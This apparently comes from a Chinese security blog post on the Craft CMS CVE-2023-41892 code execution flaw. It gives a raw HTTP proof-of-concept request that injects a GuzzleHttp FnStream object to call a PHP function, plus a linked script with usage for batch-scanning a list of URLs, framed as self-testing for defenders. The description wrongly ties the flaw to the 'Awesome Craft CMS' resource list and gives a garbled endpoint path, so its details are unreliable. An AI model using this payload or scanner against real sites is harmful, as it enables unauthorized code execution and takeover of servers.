CraftCMS CVE-2023-41892 代码执行漏洞

一、漏洞简述

Craft CMS 是一个基于PHP的开源内容管理系统,专为设计师、开发人员和内容创作者打造,以其灵活性、可扩展性和用户体验而知名。在其官方仓库中,有一个名为 Awesome Craft CMS 的项目,它是一个精选的资源列表,涵盖了插件、主题、教程及社区资源,帮助用户更好地利用Craft CMS进行网站开发。其接口/ConditionsController.php存在任意代码注入漏洞,攻击者可通过该漏洞注入恶意代码执行系统命令,从而控制该系统。

二、漏洞检测poc

POST /ConditionsController.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateContent-Length: 238
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

 

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

https://github.com/ATonysan/poc-exp/blob/main/CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py

批量检测:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -f url.txt

单个url检测漏洞:

python CraftCMS_CVE-2023-41892_ArbitraryCodeExecution.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

原创文章,作者:guozi,如若转载,请注明出处:https://www.sudun.com/ask/89804.html

(0)
guozi的头像guozi
上一篇 2024年6月5日 上午10:42
下一篇 2024年6月5日 上午10:44

相关推荐

  • 企业主机的优势与应用

    企业主机,作为网络行业的重要组成部分,具有不可替代的作用。它不仅可以提供稳定的网络环境,更能为企业带来诸多优势。但是,什么是企业主机?它究竟有哪些优势?又适用于哪些场景?如何选择适…

    行业资讯 2024年4月21日
    0
  • 域名dns异常怎么修复,dns域名解析问题

    3、对网站收入的影响:对于企业或个人拥有的网站,DNS污染会使网站无法访问,影响网站的收入。这对于依赖广告收入的网站来说是巨大的损失。 4、企业形象受损:企业自有网站如果频繁遭受D…

    行业资讯 2024年5月13日
    0
  • 小说搜索引擎

    你是否曾经被海量的小说搜索结果淹没,无从选择?或许你也曾听说过搜索引擎优化这个词,但却不知道它是什么。今天,我们就来一起探讨一下“小说搜索引擎”,了解它的发展历史、功能与特点,并学…

    行业资讯 2024年3月23日
    0
  • 义乌森山小镇,义乌森山半岛开盘价格

    您听说过“义乌SEO”这个词吗?看来与网站建设、设计行业有着密切的关系。但SEO到底是什么?它在网站建设中扮演什么角色?如果我想要进行SEO优化,我该如何开始?或许SEO优化成本是…

    行业资讯 2024年4月4日
    0

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注